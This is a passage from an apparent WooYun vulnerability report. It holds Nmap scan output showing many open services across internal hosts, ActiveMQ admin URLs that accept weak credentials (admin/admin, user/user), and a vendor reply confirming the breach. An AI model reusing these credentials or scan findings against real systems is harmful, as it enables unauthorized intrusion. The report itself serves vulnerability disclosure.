8083/tcp  open  us-srv
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
MAC Address: 90:B1:1C:01:78:DA (Unknown)
Nmap scan report for **.**.**.**4
Host is up (0.000084s latency).
Not shown: 979 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
1027/tcp  open  IIS
1030/tcp  open  iad1
1119/tcp  open  bnetgame
1433/tcp  open  ms-sql-s
3306/tcp  open  mysql
3389/tcp  open  ms-term-serv
4004/tcp  open  pxc-roid
5003/tcp  open  filemaker
5633/tcp  open  beorl
5800/tcp  open  vnc-http
5900/tcp  open  vnc
6101/tcp  open  backupexec
6106/tcp  open  isdninfo
10000/tcp open  snet-sensor-mgmt
MAC Address: 90:B1:1C:04:FC:D8 (Unknown)
Nmap scan report for **.**.**.**5
Host is up (0.00017s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
7000/tcp  open  afs3-fileserver
8000/tcp  open  http-alt
8010/tcp  open  xmpp
55055/tcp open  unknown
MAC Address: D4:AE:52:E6:77:0A (Unknown)
Nmap scan report for **.**.**.**6
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: D4:AE:52:E6:75:3F (Unknown)
Nmap scan report for **.**.**.**1
Host is up (0.000095s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
3306/tcp open  mysql
8088/tcp open  radan-http
MAC Address: C8:1F:66:ED:E7:EC (Unknown)
Nmap scan report for **.**.**.**2
Host is up (0.000092s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
111/tcp  open  rpcbind
8009/tcp open  ajp13
8088/tcp open  radan-http
MAC Address: C8:1F:66:EE:0F:30 (Unknown)
Nmap scan report for **.**.**.**3
Host is up (0.000099s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
80/tcp   open  http
81/tcp   open  hosts2-ns
82/tcp   open  xfer
83/tcp   open  mit-ml-dev
111/tcp  open  rpcbind
1099/tcp open  rmiregistry
1875/tcp open  westell-stats
2049/tcp open  nfs
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 70:E2:84:06:32:26 (Unknown)
Nmap scan report for **.**.**.**4
Host is up (0.00012s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
873/tcp  open  rsync
2049/tcp open  nfs
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
9090/tcp open  zeus-admin
MAC Address: 90:B1:1C:04:FC:F0 (Unknown)
Nmap scan report for bogon (**.**.**.**5)
Host is up (0.00012s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
81/tcp    open  hosts2-ns
82/tcp    open  xfer
111/tcp   open  rpcbind
2049/tcp  open  nfs
49156/tcp open  unknown
MAC Address: 90:B1:1C:01:78:1D (Unknown)
Nmap scan report for **.**.**.**6
Host is up (0.00017s latency).
Not shown: 995 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   closed http
81/tcp   open   hosts2-ns
8081/tcp closed blackice-icecap
8082/tcp closed blackice-alerts
MAC Address: C8:1F:66:ED:F3:52 (Unknown)
Nmap scan report for **.**.**.**4
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
161/tcp open  snmp
443/tcp open  https
MAC Address: 00:23:E9:37:8C:03 (F5 Networks)
Nmap scan report for bogon (**.**.**.**5)
Host is up (0.00016s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
161/tcp open  snmp
443/tcp open  https
MAC Address: 00:01:D7:EF:1A:C3 (F5 Networks)
Nmap scan report for **.**.**.**6
Host is up (0.00014s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
161/tcp open  snmp
443/tcp open  https
MAC Address: 00:01:D7:EF:1A:C3 (F5 Networks)
Nmap scan report for **.**.**.**9
Host is up (0.00017s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: F8:0F:41:FA:D2:B2 (Wistron InfoComm(ZhongShan))
Nmap scan report for bogon (**.**.**.**48)
Host is up (0.000080s latency).
All 1000 scanned ports on bogon (**.**.**.**48) are filtered
MAC Address: C8:1F:66:CF:53:C3 (Unknown)
Nmap scan report for **.**.**.**49
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
443/tcp open  https
MAC Address: 00:0B:AB:53:A9:A9 (Advantech Technology (china) Co.)
Nmap scan report for **.**.**.**50
Host is up (0.022s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp open     telnet
MAC Address: 70:7B:E8:E9:F7:B6 (Unknown)
Nmap scan report for bogon (**.**.**.**54)
Host is up (0.00018s latency).
Not shown: 991 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
25/tcp   filtered smtp
143/tcp  filtered imap
443/tcp  open     https
465/tcp  filtered smtps
587/tcp  filtered submission
993/tcp  filtered imaps
995/tcp  filtered pop3s
3306/tcp filtered mysql
MAC Address: 00:0B:AB:52:FB:75 (Advantech Technology (china) Co.)


几十台内网服务终端存活主机
4.外送几个弱口令:ActiveMQ
**.**.**.**:8161/admin/
http://**.**.**.**:8161/admin/
**.**.**.**:8161/admin/
密码admin/admin,user/user

修复方案:

千疮百孔

版权声明:转载请注明来源 管管侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-16 00:01

厂商回复:

由于对测试业务的安全不够重视,造成测试业务曝出安全漏洞,进而涉及入侵影响到正式业务,感谢路人甲@乌云 和乌云的工作

最新状态:

暂无